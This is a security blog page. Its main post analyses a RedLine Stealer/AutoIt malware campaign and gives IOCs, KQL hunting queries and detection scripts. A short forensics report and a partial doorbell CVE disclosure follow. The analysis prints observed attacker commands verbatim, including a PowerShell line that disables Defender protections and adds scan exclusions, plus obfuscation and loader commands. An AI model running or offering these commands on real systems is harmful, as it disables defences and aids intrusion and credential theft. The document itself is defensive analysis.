<p>genoff: a blog for my projects, write-ups, and other stuff (https://noahclements.com)</p>
<h1>RedLine Stealer/AutoIT Malware Analysis</h1>
<p>Published 2022-08-05, https://noahclements.com/RedLine-Stealer-AutoIT-Malware-Analysis</p>
<p>After analysing multiple files recovered from a compromised device, this appears to be a new strain of the AutoIT malware campaign that delivers RedLine Stealer.<br />
The campaign uses a legitimately signed AutoIt interpreter as a wrapper to deliver its payload and tries to hide its tracks with obfuscation, anti-analysis checks, and fileless techniques.</p>
<p>The user was attempting to install Grammarly and downloaded an .iso file from a malicious website.
The file was then mounted to the D:\ drive and the executable was run shortly after.</p>
<p>The malware evaded detection by dropping multiple obfuscated and encrypted temporary scripts that were then run by a renamed AutoIt executable.<br />
The RedLine Stealer component attempts to grab browser data, files from the desktop, crypto wallets, FTP client credentials, user info, screenshots, and more. The loader also set up persistent remote access: it added hidden local administrator accounts, installed RDP Wrapper, and added firewall rules allowing inbound RDP on ports 3389 and 13389.
</p>
<p>I was unable to analyze what exactly was sent in the packets to the C2 server, but event logs show that it was likely saved browser data/passwords and device information.
</p>
<p>Sources used in this write-up:</p>
<blockquote>
<ul>
<li><a href="https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns" style="color:white;">https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns</a></li>
</ul>
</blockquote>
<h1 id="details"><span style="color:white;font-size:30px;"><ins><b>Details</b></ins></span></h1>
<h2 id="user-downloaded-grammarly79784iso"><ins style="color:white;">User downloaded “<em>grammarly79784.iso</em>”</ins></h2>
<ul>
<li><em>h[xx]ps://tw0chinz[.]com/y4TyREUBrJ/?gaLm9GUXTK=[base64 line]</em></li>
<li>which originated from URL <em>h[xx]ps://nice-quiz[.]com</em></li>
<li>This URL was a one-time link as it now returns “<em>Error: Wrong GET request.”</em> This was likely done as an effort to evade analysis/detection</li>
<li>The base <em>tw0chinz[.]com</em> URL shows a Cloudflare DDOS protection waiting screen which never redirects.</li>
</ul>
<h2 id="grammarly79784exe-was-executed-from-d"><ins style="color:white;">“<em>GRAMMARLY79784.EXE</em>” was executed from D:\</ins></h2>
<ul>
<li>This was mounted to D:\ following the .iso download.</li>
<li>Volume Info: <em>\VOLUME{0000000000000000-a0e06908} Serial: A0E06908 Created: 1601-01-01 00:00:00 Directories: 0 File references: 1</em></li>
<li>Observed using the Rundll32 technique: the dropper is a Microsoft IExpress/WEXTRACT self-extracting package, which unpacks into <em>%TEMP%\IXP000.TMP</em> and registers a RunOnce cleanup entry that calls <em>rundll32.exe advpack.dll,DelNodeRunDLL32</em> to delete that folder afterwards.</li>
<li>On execution it clears that RunOnce entry, value name <em>wextract_cleanup0</em>.</li>
<li>Size: 297.84 MB. A file this large is consistent with padding added to stay above the upload limits of sandboxes and many AV scanners.</li>
</ul>
<h2 id="executable-prefetch-file-shows-that-five-files-were-created-in-folder-cusersuserappdatalocaltempixp000tmp"><ins style="color:white;">Executable Prefetch file shows that five files were created in folder <em>C:\Users\User\AppData\Local\Temp\IXP000.TMP\</em></ins></h2>
<p><img src="/assets/images/Prefetch.png" alt="Prefetch" /></p>
<ul>
<li>Che.vsd
<ul>
<li><a href="https://www.virustotal.com/gui/file/52efaf93011bb26252948ae7baa2c180d21b9e8d1b9f9f67431aa782e4ba035b" style="color:white;">VirusTotal Link</a></li>
</ul>
</li>
<li>Confronto.vsd
<ul>
<li><a href="https://www.virustotal.com/gui/file/8cb90c182c28aec4d54cc122dcad3dfc70bad73fb7a3e28e2640f558407bf8f6" style="color:white;">VirusTotal Link</a></li>
</ul>
</li>
<li>Aspettero.vsd</li>
<li>Scegliere.vsd</li>
<li>Narcotico.vsd</li>
</ul>
<h2 id="confusaexepif-is-executed-from-folder-localtempixp000tmp"><ins style="color:white;"><em>Confusa.exe.pif</em> is executed from folder <em>\Local\Temp\IXP000.TMP</em></ins></h2>
<ul>
<li>File is the legitimate AutoIt interpreter, signed by AutoIT Consulting Ltd and renamed with a .pif extension
<ul>
<li><a href="https://www.virustotal.com/gui/file/3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0" style="color:white;">VirusTotal Link </a></li>
</ul>
</li>
<li>Relations in Virustotal show that many Execution Parents share Backdoor/RedLine detection.</li>
<li><strong>This is the main source of all malicious activity that followed</strong></li>
<li>Spawns <em>jsc.exe</em> (the JScript .NET compiler shipped with the .NET Framework) as a child process. A signed Microsoft binary started by the AutoIt interpreter like this is most likely the host process into which the final payload is injected; the <em>plink.exe</em> drop listed in the IOCs is written by this process</li>
</ul>
<h2 id="confusaexepif-activities"><ins style="color:white;"><em>Confusa.exe.pif</em> activities</ins></h2>
<ul>
<li><em>cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles","$env:Appdata";Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe";Add-MpPreference -ExclusionExtension vbs; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled</em> (Defender tampering: exclusions for the drop paths, wscript.exe and .vbs files, sample submission off, PUA protection off)</li>
<li>established connection with <em>136.244.105.79:80 (atmosphereexpansion[.]quest)</em></li>
<li>Ran WMI queries (IWbemServices::ExecQuery) for DiskDrive, AntiVirusProduct, AntiSpywareProduct, FirewallProduct, Processor, VideoController, OperatingSystem and Process, i.e. host fingerprinting for the stealer's report</li>
<li>Attempts to take screenshot using BitBlt API</li>
<li>Creates six .vbs files in <em>C:\Users\User\AppData\Roaming\XaCFEtuQIX\</em></li>
<li>CCleaner added as a scheduled task</li>
<li>Created a batch file in <em>\AppData\Roaming\XaCFEtuQIX\</em></li>
<li>Accesses Chrome and Edge Login and Web Data
<ul>
<li>\AppData\Local\Google\Chrome\User Data\Default\Login Data</li>
<li>\AppData\Local\Google\Chrome\User Data\Default\Web Data</li>
<li>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data</li>
<li>\AppData\Local\Microsoft\Edge\User Data\Default\Web Data</li>
</ul>
</li>
<li>Installs RDP Wrapper</li>
<li>Creates a <em>MySQLNotifierTask56</em> scheduled task</li>
<li>Drops <em>plink.exe</em> (PuTTY's command-line SSH client, commonly used by attackers to tunnel RDP over SSH) in <em>\AppData\Roaming\</em></li>
</ul>
<h2 id="ezcvajcfbrmcwvbs-also-ran-as-an-identical-batch-file"><ins style="color:white;">ezcvajcfbrmcw.vbs (Also ran as an identical batch file)</ins></h2>
<p><img src="/assets/images/ezcvajcfbrmcw.png" alt="batch code" width="80%" height="70%" /></p>
<ul>
<li>Adds multiple local users and places them in the “Administrators” and “Remote Desktop Users” groups</li>
<li>Hides those users from the logon screen by adding them to the <em>Winlogon\SpecialAccounts\UserList</em> registry key</li>
<li>Creates firewall rules allowing inbound RDP connections on ports 13389 and 3389</li>
<li>Tampers with Windows Defender: excludes the following from scanning, turns off sample submission, and disables PUA protection
<ul>
<li>$env:ProgramFiles (path exclusion)</li>
<li>$env:Appdata (path exclusion)</li>
<li>C:\Windows\System32\wscript.exe (process exclusion)</li>
<li>*.vbs (extension exclusion)</li>
</ul>
</li>
<li>Deletes the Windows Defender scan history</li>
</ul>
<h2 id="irpksgnunggrgbvbs"><ins style="color:white;">iRPKSGnUNGgrgb.vbs</ins></h2>
<p><img src="/assets/images/iRPKSGnUNGgrgb_cmd.png" alt="vbs command line" /></p>
<p>This appears to communicate with the C2 server, initially sending the unique bot ID.</p>
<ul>
<li>The first successful communications were to <em>tw0chinz[.]com</em> where the download originated, however further requests were sent to <em>ifunteck[.]com</em>
<ul>
<li><img src="/assets/images/iRPKSGnUNGgrgb_code.png" alt="vbs malware" width="80%" height="90%" /></li>
</ul>
</li>
<li>C2 Server(s) URL: <em>h[xx]ps://ifunteck[.]com</em> and <em>h[xx]ps://tw0chinz[.]com</em>
<ul>
<li>Sent decoded command: <em>GzO=siuvqJCeOb&amp;LBJn=aFvMHnOOkI&amp;KISvury={246A96FD-DC5A-4B76-BC69-4CE9DA1E3B43}</em> (randomly named form fields carrying the bot ID GUID)
<ul>
<li>Similar structure to the decrypted C2 traffic shown in the Zscaler write-up:</li>
</ul>
<p><img src="/assets/images/cybergate_decrypted_comm.jpg" alt="C2 Communication" width="60%" height="60%" /></p>
</li>
</ul>
</li>
<li>There were seven network packets sent to the C2 IP address. Logs show that it was likely saved browser data/passwords and device information.</li>
<li>This script also downloads RDPWrap from a Github repo
<ul>
<li>https://github.com/stascorp/rdpwrap
<ul>
<li><img src="/assets/images/rdpwrap.png" alt="rdpwrap install" /></li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="oqelmujegltwrbmvbs"><ins style="color:white;">oqelmujegltwrbm.vbs</ins></h2>
<ul>
<li>Appears to install RDPWrap and ensure persistence on the device</li>
<li>
<p><em>reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"</em>
</p>
<p><img src="/assets/images/oqelmujegltwrbm_code.png" alt="vbs malware" width="50%" height="50%" /></p>
</li>
</ul>
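<p>The two RDPWrap persistence artefacts above (the TermService <em>ServiceDll</em> repointed at <em>rdpwrap.dll</em>, and the hidden accounts under <em>SpecialAccounts\UserList</em> from the ezcvajcfbrmcw.vbs section) can be checked from saved <em>reg query</em> output. The following is an added example, not code from the write-up: the parser handles the text layout <em>reg query</em> prints, and the sample output, including the account name <em>svc_update</em>, is constructed for the demonstration.</p>

```python
"""Check saved `reg query` output for the RDPWrap persistence artefacts.

Added example, not from the original write-up. Parses the text format that
`reg query <key>` prints (key path on its own line, values indented by four
spaces with four-space field separators) and flags a non-stock TermService
ServiceDll and accounts hidden from the logon screen. Sample output and the
account name are constructed.
"""
import re
from typing import Dict, List, Tuple

RegTree = Dict[str, Dict[str, Tuple[str, str]]]  # key -> value name -> (type, data)

_VALUE_RE = re.compile(r"^ {4}(.+?) {4}(REG_[A-Z_]+)(?: {4}(.*))?$")

TERMSERVICE_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters"
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
# The value Windows ships with; RDPWrap rewrites it to point at rdpwrap.dll.
STOCK_TERMSRV = r"%systemroot%\system32\termsrv.dll"


def parse_reg_query(text: str) -> RegTree:
    """Parse `reg query` output into {key: {value_name: (type, data)}}."""
    tree: RegTree = {}
    current = None
    for line in text.splitlines():
        if not line.strip() or line.startswith("End of search"):
            continue                      # blank lines and the /f summary line
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, vtype, data = m.group(1), m.group(2), m.group(3) or ""
            tree[current][name] = (vtype, data)
        elif not line.startswith(" "):
            current = line.strip()        # a key path starts at column 0
            tree.setdefault(current, {})
    return tree


def suspicious_termservice_dll(tree: RegTree) -> str:
    """Return the ServiceDll path if it is not the stock termsrv.dll, else ""."""
    dll = tree.get(TERMSERVICE_KEY, {}).get("ServiceDll", ("", ""))[1]
    norm = dll.lower().replace(r"c:\windows", "%systemroot%")
    return "" if not dll or norm == STOCK_TERMSRV else dll


def hidden_accounts(tree: RegTree) -> List[str]:
    """Accounts hidden from the logon screen: REG_DWORD 0 under SpecialAccounts\\UserList."""
    return [name for name, (vtype, data) in tree.get(USERLIST_KEY, {}).items()
            if vtype == "REG_DWORD" and int(data, 16) == 0]


# Constructed output of `reg query <key>` on an infected host.
SAMPLE_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters
    ServiceDll    REG_EXPAND_SZ    C:\Program Files\RDP Wrapper\rdpwrap.dll
    ServiceDllUnloadOnStop    REG_DWORD    0x1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
    svc_update    REG_DWORD    0x0
"""

# Constructed output from a clean host for comparison.
CLEAN_REG_OUTPUT = r"""
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService\Parameters
    ServiceDll    REG_EXPAND_SZ    %SystemRoot%\System32\termsrv.dll
    ServiceDllUnloadOnStop    REG_DWORD    0x1
"""

if __name__ == "__main__":
    tree = parse_reg_query(SAMPLE_REG_OUTPUT)
    print("TermService ServiceDll:", suspicious_termservice_dll(tree) or "stock")
    print("hidden accounts:", hidden_accounts(tree))
```

<p>On a live host the same two keys are collected with <em>reg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters"</em> and <em>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"</em>; the parser only needs the saved text.</p>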
<h2 id="gycxepariqvwskisvbs"><ins style="color:white;">GYCxEPARiqVWSkIs.vbs</ins></h2>
<ul>
<li>Appears to be the script responsible for the RDPWrap-based remote access and exfiltration channel, and for auto-updating RDPWrap.
<img src="/assets/images/GYCxEPARiqVWSkIs_rdp.png" alt="vbs malware" width="70%" height="70%" /></li>
<li>Features comment in Russian that translates to “Write a line”
<img src="/assets/images/GYCxEPARiqVWSkIs_russian.png" alt="russian code comment" /> </li>
<li>Three of the .vbs files embed XML, which appears to be used to launch further scripts
<img src="/assets/images/xml_1.png" alt="xml formatting" />
<img src="/assets/images/xml_2.png" alt="xml formatting 2" width="70%" height="70%" />
<img src="/assets/images/xml_3.png" alt="xml formatting 3" /></li>
</ul>
<h1 id="iocs"><span style="color:white;font-size:30px;"><ins><b>IOC’s</b></ins></span></h1>
<ul>
<li>563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14</li>
<li>7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512</li>
<li>d0808b62e5c840b879d4ae0aabf78878271ee724bfcf58001032c295ec69cd4d</li>
<li>b8a717e36a89ebd6384e5f56b2691c34c1fedf08f9911b5e4c3f127f70edfb62</li>
<li>dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00</li>
<li>c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928</li>
<li>f75cbd2fc596ba51eb485947f7a24a139b5545ec3ebe16e96b89fe38440bb974</li>
<li>049e86e6c3f73cdf6147075a2eab50c009874ea9b0b174a150add6fb73c1d9b4</li>
<li>3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0</li>
<li>e970530af9bbf865f4c7de8d113e522f5f32afd5c84f378d15bf073810507599</li>
<li>ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753</li>
<li>8cb90c182c28aec4d54cc122dcad3dfc70bad73fb7a3e28e2640f558407bf8f6</li>
<li>798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4</li>
<li>52efaf93011bb26252948ae7baa2c180d21b9e8d1b9f9f67431aa782e4ba035b</li>
<li>d113d314895748bf9d1a8926ea6fa4f734b604ebb69cd04a624179c35ff88eaa</li>
<li>90a410437c4523cb14f348c3dcdb8256b3dfa1e6ac524be2793fdcab64258b11</li>
<li>3cea6eaf23e94e38d790a9ccf43e490f8ad3da3eb920e3a967d18947905b60b7</li>
<li>b5665cb53721f0039c34e05f88f259e64a224027cf6be34f3ac13082ab8a0663</li>
<li>e868aba6d185c35ac1ca083c53cfc3a1259731eca319bb4a487b358d620e190a</li>
<li>a8108a5add857c8d3d6e8b1f4a55a1243f6d728dd8904b29e0622ea8df3f60a6</li>
<li>f75b7f5ac63dac86514ef42e1644b5450524fee4291c520364814bcc951814ba</li>
<li>h[xx]ps://ifunteck[.]com</li>
<li>h[xx]ps://tw0chinz[.]com</li>
<li>h[xx]ps://nice-quiz[.]com</li>
<li><em>findstr /V /R "^zsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDk$" Che.vsd</em> (strips the decoy line out of the dropped file to reconstruct the script)</li>
<li><em>C:\Windows\SysWOW64\PING.EXE ping localhost -n 5</em></li>
<li><em>cmd /c cmd &lt; Confronto.vsd &amp; ping -n 5 localhost</em> (feeds the dropped file to cmd on stdin, then sleeps via ping)</li>
<li><em>*.exe.pif</em> files being created</li>
<li><em>jsc.exe</em> being a child process of <em>*.exe.pif</em></li>
<li><em>IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive</em></li>
<li><em>IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController</em></li>
<li>New files in <em>C:\USERS\User\APPDATA\LOCAL\TEMP\IXP000.TMP\</em></li>
<li><em>cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles","$env:Appdata";Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe";Add-MpPreference -ExclusionExtension vbs; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled</em></li>
<li>New .vbs and .bat files added in <em>C:\Users\User\AppData\Roaming\&lt;random folder name&gt;\</em></li>
<li><em>C:\Users\User\AppData\Roaming\plink.exe</em> being created by <em>jsc.exe</em></li>
</ul>
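<p>The process-creation IOCs above (the Defender-tampering PowerShell line, the <em>findstr /V /R</em> de-obfuscation, <em>cmd &lt; file.vsd</em> with the <em>ping -n 5</em> sleep, the <em>.exe.pif</em> run from <em>IXP000.TMP</em>, and <em>jsc.exe</em> as a child of the .pif) can be expressed as rules over process events, and the beacon body from the iRPKSGnUNGgrgb.vbs section can be reduced to its bot ID. The following is an added example, not code from the write-up: the event records are constructed to resemble the observed artefacts, and their field names follow Microsoft 365 Defender's <em>DeviceProcessEvents</em> table so each rule lines up with the KQL further down.</p>

```python
"""Rules for the process-creation IOCs, run over constructed event records.

Added example, not code from the original write-up. The records are made up
to resemble the artefacts described above; field names follow Microsoft 365
Defender's DeviceProcessEvents table.
"""
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import parse_qs

Event = Dict[str, str]


def _cmd(ev: Event) -> str:
    return ev.get("ProcessCommandLine", "").lower()


def _file(ev: Event) -> str:
    return ev.get("FileName", "").lower()


# (rule name, predicate). Everything is lower-cased first: Windows paths and
# command lines are case-insensitive and the samples mix case freely.
RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    # Add-MpPreference -Exclusion* or Set-MpPreference switching off sample
    # submission / PUA protection, as in the observed one-liner.
    ("defender_tamper", lambda ev: re.search(
        r"add-mppreference\s+-exclusion|set-mppreference\s+-(submitsamplesconsent|puaprotection)",
        _cmd(ev)) is not None),
    # findstr /V /R "^<long junk line>$" <dropped file>: drops the decoy line
    # from a dropped .vsd to rebuild the real script.
    ("findstr_deobfuscation", lambda ev: re.search(
        r'findstr\s+/v\s+/r\s+"\^[a-z0-9]{20,}\$"', _cmd(ev)) is not None),
    # cmd < file.vsd: the dropped file is fed to cmd on stdin instead of being
    # run as a .bat, so the .vsd extension never needs to be executable.
    ("cmd_stdin_vsd", lambda ev: re.search(r"cmd\s*<\s*\S+\.vsd\b", _cmd(ev)) is not None),
    # ping -n 5 localhost used as a sleep; noisy alone, useful chained with the above.
    ("ping_sleep", lambda ev: re.search(
        r"\bping(\.exe)?\s+(localhost\s+)?-n\s+5\b", _cmd(ev)) is not None),
    # Renamed AutoIt interpreter executed from the WEXTRACT temp folder.
    ("exe_pif_from_ixp", lambda ev: _file(ev).endswith(".exe.pif")
        and "\\ixp000.tmp" in ev.get("FolderPath", "").lower()),
    # jsc.exe (JScript.NET compiler) started by the .pif.
    ("jsc_child_of_pif", lambda ev: _file(ev) == "jsc.exe"
        and ev.get("InitiatingProcessFileName", "").lower().endswith(".pif")),
]


def scan(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, FileName) for every rule that fires on each event."""
    return [(name, ev.get("FileName", ""))
            for ev in events for name, pred in RULES if pred(ev)]


GUID_RE = re.compile(
    r"^\{?[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\}?$", re.I)


def extract_bot_id(decoded_body: str) -> str:
    """Pull the GUID (bot ID) out of the beacon's form body.

    The field names (GzO, LBJn, KISvury in the capture) are random, so the
    value is matched on its shape rather than on a key.
    """
    for values in parse_qs(decoded_body).values():
        for value in values:
            if GUID_RE.match(value):
                return value.strip("{}").upper()
    raise ValueError("no GUID in beacon body")


# Constructed records mirroring the write-up's artefacts; benign controls last.
SAMPLE_EVENTS: List[Event] = [
    {"FileName": "cmd.exe", "FolderPath": r"C:\Windows\System32",
     "InitiatingProcessFileName": "Confusa.exe.pif",
     "ProcessCommandLine": r'cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath "$env:ProgramFiles","$env:Appdata";Add-MpPreference -ExclusionProcess "C:\Windows\System32\wscript.exe";Add-MpPreference -ExclusionExtension vbs; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled'},
    {"FileName": "findstr.exe", "FolderPath": r"C:\Windows\System32",
     "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": r'findstr /V /R "^zsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDk$" Che.vsd'},
    {"FileName": "cmd.exe", "FolderPath": r"C:\Windows\System32",
     "InitiatingProcessFileName": "GRAMMARLY79784.EXE",
     "ProcessCommandLine": "cmd /c cmd < Confronto.vsd & ping -n 5 localhost"},
    {"FileName": "Confusa.exe.pif",
     "FolderPath": r"C:\Users\User\AppData\Local\Temp\IXP000.TMP",
     "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": r"C:\Users\User\AppData\Local\Temp\IXP000.TMP\Confusa.exe.pif"},
    {"FileName": "jsc.exe",
     "FolderPath": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319",
     "InitiatingProcessFileName": "Confusa.exe.pif",
     "ProcessCommandLine": "jsc.exe"},
    {"FileName": "ping.exe", "FolderPath": r"C:\Windows\System32",
     "InitiatingProcessFileName": "cmd.exe",
     "ProcessCommandLine": "ping -n 1 192.0.2.1"},
    {"FileName": "powershell.exe",
     "FolderPath": r"C:\Windows\System32\WindowsPowerShell\v1.0",
     "InitiatingProcessFileName": "explorer.exe",
     "ProcessCommandLine": "powershell -Command Get-MpPreference"},
]

if __name__ == "__main__":
    for rule, filename in scan(SAMPLE_EVENTS):
        print(f"{rule:24s} {filename}")
    print(extract_bot_id("GzO=siuvqJCeOb&LBJn=aFvMHnOOkI&KISvury={246A96FD-DC5A-4B76-BC69-4CE9DA1E3B43}"))
```

<p>The <em>ping_sleep</em> rule is deliberately kept separate: on its own it fires on ordinary scripts, so in practice it is worth correlating with <em>cmd_stdin_vsd</em> or <em>findstr_deobfuscation</em> from the same parent process rather than alerting on it alone.</p>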
<h1 id="365-defender-kql-queries"><span style="color:white;font-size:30px;"><ins><b>365 Defender KQL Queries</b></ins></span></h1>
<h2 id="urls"><ins style="color:white;">URL’s</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceNetworkEvents
| where RemoteUrl contains "tw0chinz" or RemoteUrl contains "nice-quiz"
or RemoteUrl contains "ifunteck" or RemoteUrl contains "Hyphnhostn"
or RemoteUrl contains "trk.record-certainly-numeral-draw"
or RemoteUrl contains "schemicalc" or RemoteUrl contains "bishoppeda"
</code></pre></div></div>
<h2 id="hashes"><ins style="color:white;">Hashes</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where SHA256 has_any ("563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14",
"7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512",
"d0808b62e5c840b879d4ae0aabf78878271ee724bfcf58001032c295ec69cd4d",
"b8a717e36a89ebd6384e5f56b2691c34c1fedf08f9911b5e4c3f127f70edfb62",
"dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00",
"c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928",
"f75cbd2fc596ba51eb485947f7a24a139b5545ec3ebe16e96b89fe38440bb974",
"049e86e6c3f73cdf6147075a2eab50c009874ea9b0b174a150add6fb73c1d9b4",
"3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0",
"e970530af9bbf865f4c7de8d113e522f5f32afd5c84f378d15bf073810507599",
"ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753",
"8cb90c182c28aec4d54cc122dcad3dfc70bad73fb7a3e28e2640f558407bf8f6",
"798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4",
"52efaf93011bb26252948ae7baa2c180d21b9e8d1b9f9f67431aa782e4ba035b",
"d113d314895748bf9d1a8926ea6fa4f734b604ebb69cd04a624179c35ff88eaa",
"90a410437c4523cb14f348c3dcdb8256b3dfa1e6ac524be2793fdcab64258b11",
"3cea6eaf23e94e38d790a9ccf43e490f8ad3da3eb920e3a967d18947905b60b7",
"b5665cb53721f0039c34e05f88f259e64a224027cf6be34f3ac13082ab8a0663",
"e868aba6d185c35ac1ca083c53cfc3a1259731eca319bb4a487b358d620e190a",
"a8108a5add857c8d3d6e8b1f4a55a1243f6d728dd8904b29e0622ea8df3f60a6",
"f75b7f5ac63dac86514ef42e1644b5450524fee4291c520364814bcc951814ba")
</code></pre></div></div>
<h2 id="pif-file-ioc"><ins style="color:white;">.pif File IOC</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".exe.pif"
</code></pre></div></div>
<h2 id="common-temp-folder-used"><ins style="color:white;">Common temp folder used</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".vsd"
| where FolderPath contains "\\AppData\\Local\\Temp\\IXP000.TMP\\"
</code></pre></div></div>
<h2 id="initial-exploit-ioc"><ins style="color:white;">Initial exploit IOC</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceProcessEvents
| where ProcessCommandLine contains "findstr /V /R"
</code></pre></div></div>
<h2 id="common-folder-used-for-scripts"><ins style="color:white;">Common folder used for scripts</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".vbs" or FileName endswith ".bat"
| where FolderPath contains "\\AppData\\Roaming\\"
</code></pre></div></div>
<h2 id="jscexe-being-used-to-compile-and-execute-pe-files"><ins style="color:white;">jsc.exe being used to compile and execute PE files</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceProcessEvents
| where (FileName =~ "jsc.exe" and InitiatingProcessFileName endswith ".pif")
    or (InitiatingProcessFileName =~ "jsc.exe" and InitiatingProcessParentFileName endswith ".pif")
</code></pre></div></div>
<h2 id="initial-download-of-redline-malware"><ins style="color:white;">Initial download of RedLine malware</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".iso"
| where FolderPath contains "Recycle.Bin"
</code></pre></div></div>
<h2 id="localhost-ping-before-further-action-is-done"><ins style="color:white;">Localhost ping before further action is done</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceProcessEvents
| where ProcessCommandLine contains "ping -n 5"
</code></pre></div></div>
<h1>CS4419 Forensics Final Report</h1>
<p>Published 2022-08-04, https://noahclements.com/CS4419-Forensics-Final-Report</p>
<p>The goal of this final project was to analyze five memory dumps containing malicious activity and to come to a conclusion on what malware family it belonged to.
</p>
<p>This was my first forensics investigation using memory dumps and was an incredibly fun process digging through all the activity.
</p>
<p>Please note that my conclusions are just guesses based on my findings and may not be entirely accurate.
</p>
<embed src="/assets/images/CS4419 Final Report - Noah Clements.pdf" width="100%" height="1000px" align="center" />
<h1>Improper Input Validation on dbell Smart Doorbell Can Lead To Attackers Remotely Unlocking Door</h1>
<p>Published 2019-10-07, https://noahclements.com/Improper-Input-Validation-on-dbell-Smart-Doorbell-Can-Lead-To-Attackers-Remotely-Unlocking-Door</p>
<ul>
<li>CVE Number: CVE-2019-13336</li>
</ul>
<center><h3>Foreword</h3></center>
<p>Before I get into this writeup, I’d like to thank Tamir Israel from the CIPPIC for helping me with legal issues regarding this disclosure and the EFF for referring me to him.
</p>
<p>This vulnerability allows anyone who can reach the doorbell’s web server (port 81) to invoke its CGI functions without any credential check. In particular, if a lock is wired to the relay switch on the doorbell, the door can be unlocked from the local network, or remotely if the device is exposed to the internet. Multiple email exchanges took place between me and dbell. <strong>This vulnerability remains unpatched.</strong>
</p>
<center><h3>Details</h3></center>
<p>After connecting the doorbell to my network, I started with a simple nmap port scan.</p>
<p><img src="/assets/images/nmap.png" alt="nmap scan" /></p>
<p>After going to port 81 in my browser, it led me to a GoAhead web server login request.</p>
<p><img src="/assets/images/rsz_login.png" alt="GoAhead login" /></p>
<p>I tried the default credentials listed on the back of the doorbell (user <em>admin</em>, blank password) and was given this interface.</p>
<p><img src="/assets/images/rsz_page.png" alt="Page" /></p>
<p>There were many cases of hardcoded credentials throughout the source code on the doorbell’s webserver.
</p>
<p><img src="/assets/images/rsz_creds1.png" alt="hardcoded creds 1" />
<img src="/assets/images/rsz_creds2.png" alt="hardcoded creds 1" /></p>
<p>But I was mostly interested in this commented-out URL.
</p>
<p><img src="/assets/images/rsz_url.png" alt="commented out URL" /></p>
<p>
This looked to me as a gateway to reverse engineer the source code and call any of the functions.</p>
